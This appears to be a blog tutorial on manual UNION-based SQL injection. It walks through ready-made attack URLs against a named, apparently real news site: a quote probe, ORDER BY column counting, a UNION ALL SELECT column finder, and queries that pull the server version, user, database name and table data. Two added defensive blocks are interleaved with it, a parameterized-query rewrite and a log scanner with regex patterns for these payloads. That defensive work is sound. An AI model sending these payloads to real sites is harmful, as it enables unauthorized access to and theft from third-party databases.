SQL INJECTION
IN THE NAME OF ALLAH THE MOST BENEFICENT AND MERCIFUL.
Today I am going to post a tutorial on simple SQL injection. Earlier I posted one on error-based SQL injection, but some of my friends asked me to make a tutorial on simple, basic SQL injection.
So let's start.
First, take a site that is vulnerable to SQL injection.
I picked this one:
http://raahauges.com/view-news.php?id=8
Now put a ' at the end, like this:
http://raahauges.com/view-news.php?id=8'
You will see that there is an error:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
Here we see the SQL error, but sometimes it isn't shown and instead something is missing from the printed page, so we can say that the site is vulnerable to SQL injection. Many sites show the SQL error.
Now you have to find the number of columns, because the website's data is stored in columns. To find it, use ORDER BY, like this:
http://raahauges.com/view-news.php?id=8 order by 1 --+
(--+ is used to close your query: -- starts an SQL comment and the + is decoded as the space that must follow it.)
With the query above you get the main page as it was before adding the '. Now keep incrementing the number like this:
http://raahauges.com/view-news.php?id=8 order by 1 --+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 2 --+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 3--+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 4 --+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 5 --+ (load manually)
http://raahauges.com/view-news.php?id=8 order by 6--+ (Unknown column '6' in 'order clause')
So we now know that there are 5 columns.
Now we can find the vulnerable column. To find it, use a UNION ALL SELECT statement, like this:
http://raahauges.com/view-news.php?id=-8+UNION+ALL+SELECT+1,2,3,4,5--+
Put a - after id= and before the 8 so that the vulnerable column gets printed.
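The quote, ORDER BY and UNION ALL SELECT requests above only work because the page pastes the id value straight into its SQL text. The following is an added example, not code from the original post or from the site: it uses an in-memory SQLite database in place of MariaDB, and the five-column news schema and all function names are assumptions made for the illustration. It runs the walkthrough's inputs against a concatenating handler and against a validated, parameterized one.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data: a five-column news table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, "
               "body TEXT, author TEXT, date TEXT)")
    db.execute("INSERT INTO news VALUES (8, 'Title', 'Body', 'editor', '2024-01-01')")
    return db

def view_news_vulnerable(db, raw_id):
    # 'Before': the parameter is pasted into the SQL text, so whatever follows
    # the number (ORDER BY, UNION ALL SELECT, a comment) is parsed as SQL.
    return db.execute("SELECT * FROM news WHERE id = " + raw_id).fetchall()

def view_news_hardened(db, raw_id):
    # 'After': accept only a plain integer, then bind it as a parameter so the
    # value can never change the structure of the statement.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title, body, author, date FROM news WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def outcome(fn, db, raw_id):
    """Run a handler and report its rows, 'sql-error' or 'rejected'."""
    try:
        return fn(db, raw_id)
    except sqlite3.Error:
        # Log the detail server-side; never echo the database message to the client.
        return "sql-error"
    except ValueError:
        return "rejected"

# Inputs taken from the walkthrough above, URL-decoded.
INPUTS = ["8", "8'", "8 order by 5-- ", "8 order by 6-- ",
          "-8 UNION ALL SELECT 1,2,3,4,5-- "]

if __name__ == "__main__":
    db = make_db()
    for raw in INPUTS:
        print(repr(raw), outcome(view_news_vulnerable, db, raw),
              outcome(view_news_hardened, db, raw))
```

With the hardened handler every input except the plain 8 is rejected before it reaches the database, and the client never sees a database error message.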
Now we have to fetch the data from that column.
There are many different expressions for getting data. Before getting the tables, I will define some:
@@version => to find the version of the database server (just put @@version in the vulnerable column):
http://raahauges.com/view-news.php?id=-8+UNION+ALL+SELECT+1,2,@@version,4,5--+
USER()
DATABASE()
IF((@@LOWER_CASE_TABLE_NAMES)=0,0x594553,0x4e4f)
IF((@@LOWER_CASE_FILE_SYSTEM)=0,0x594553,0x4e4f)
@@HOSTNAME
@@PORT
@@MYISAM_RECOVER_OPTIONS
@@VERSION_COMPILE_OS
@@WAIT_TIMEOUT
Just put any of them in the vulnerable column and get your desired result.
Now we have to find the tables from the vulnerable column.
For that purpose, a leet named trojan made a DIOS (Dump In One Shot) query, which will print all the columns and tables.
Now, to get that information, just put that table name in the vulnerable column and at the end the column name, like this.
Suppose I need information about id and date from the col. NEWS.
The query would look like this:
http://raahauges.com/view-news.php?id=-8+UNION+ALL+SELECT+1,2,concat(id,0x3a3a3a3a3a,date),4,5 from news --+
The CONCAT function is used to join two things, and 0x3a is used to print a : character.
So you get your desired result.
Hope you got all that. :D
If you have any problem, just comment. :)
Thanks.
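Each request in this walkthrough leaves a recognisable query string in the web server's access log. The following is an added example, not part of the original post: the log lines are constructed (documentation IP addresses, a generic combined-log layout), and the rule names and regular expressions are assumptions chosen to match the request shapes shown above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristics for the request shapes used in the walkthrough above.
RULES = [
    ("quote-probe", re.compile(r"^-?\d+\s*['\"]")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
    ("server-variable", re.compile(r"@@\w+|\b(user|database|version)\s*\(", re.I)),
    ("comment-tail", re.compile(r"--\s*$")),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
198.51.100.4 - - [01/Jan/2024:10:00:00 +0000] "GET /view-news.php?id=8 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /view-news.php?id=8%27 HTTP/1.1" 200 310
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /view-news.php?id=8%20order%20by%206--+ HTTP/1.1" 200 298
203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /view-news.php?id=-8+UNION+ALL+SELECT+1,2,@@version,4,5--+ HTTP/1.1" 200 5233
""".splitlines()

def scan_line(line):
    """Return (client_ip, [rule names]) for a suspicious request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, target, _status = m.groups()
    hits = set()
    # parse_qsl URL-decodes each value, turning '+' and %20 into spaces.
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(rule for rule, rx in RULES if rx.search(value))
    return (ip, sorted(hits)) if hits else None

def summarize(lines):
    """Group matched rules by client so a probing sequence stands out."""
    seen = {}
    for line in lines:
        hit = scan_line(line)
        if hit:
            seen.setdefault(hit[0], set()).update(hit[1])
    return {ip: sorted(rules) for ip, rules in seen.items()}

if __name__ == "__main__":
    for ip, rules in summarize(SAMPLE_LOG).items():
        print(ip, rules)
```

A single rule firing once can be noise. One client tripping quote-probe, order-by-probe and union-select within a short window is the sequence this tutorial describes and is worth alerting on.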
Video tutorial. :)